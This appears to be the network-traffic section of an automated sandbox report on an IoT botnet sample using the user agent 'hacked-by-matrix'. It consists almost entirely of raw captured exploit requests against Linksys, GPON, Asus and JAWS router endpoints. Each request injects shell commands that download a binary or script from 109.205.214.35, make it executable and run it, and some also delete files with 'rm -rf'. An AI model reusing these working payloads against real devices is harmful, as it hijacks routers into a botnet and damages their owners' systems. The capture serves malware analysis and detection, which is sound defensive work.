                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:51.309525967 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2287192.168.2.13460325.177.33.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932482004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2288192.168.2.1348792212.230.182.222443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932531118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2289192.168.2.1355692212.43.132.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932538986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2290192.168.2.1342864109.1.135.96443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932562113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2291192.168.2.13421385.147.230.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932564974 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2292192.168.2.133459442.186.149.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932564974 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2293192.168.2.1353294118.36.177.64443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932590961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2294192.168.2.1350104109.108.71.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932602882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2295192.168.2.1339942109.46.218.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932631969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2296192.168.2.1341938212.112.49.92443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932642937 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2297192.168.2.135389842.225.79.102443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932650089 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2298192.168.2.134320642.237.244.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932673931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2299192.168.2.134346842.241.113.226443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932687998 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2300192.168.2.134080442.235.209.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932703018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2301192.168.2.1357556109.217.232.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932754040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2302192.168.2.133929442.133.148.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932761908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2303192.168.2.133734242.203.87.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.932768106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2304192.168.2.1340886172.67.176.1428080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.242638111 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:51.756242037 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2305192.168.2.1352938172.67.173.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.242688894 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:51.756242990 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2306192.168.2.1346232172.64.18.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.323178053 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2307192.168.2.1358966172.64.108.1828080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.346781015 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2308192.168.2.1359940172.65.8.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.346843958 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2309192.168.2.1358526172.65.197.1678080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.346947908 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2310192.168.2.1353132172.67.159.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.347029924 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2311192.168.2.1335132172.87.200.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.487396955 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2312192.168.2.135362274.94.28.25080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.614227057 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:52.204250097 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:52.313574076 CET301INHTTP/1.0 404 Not Found
                                                        Server: SonicWALL
                                                        Expires: -1
                                                        Cache-Control: no-cache
                                                        Content-type: text/html;charset=UTF-8
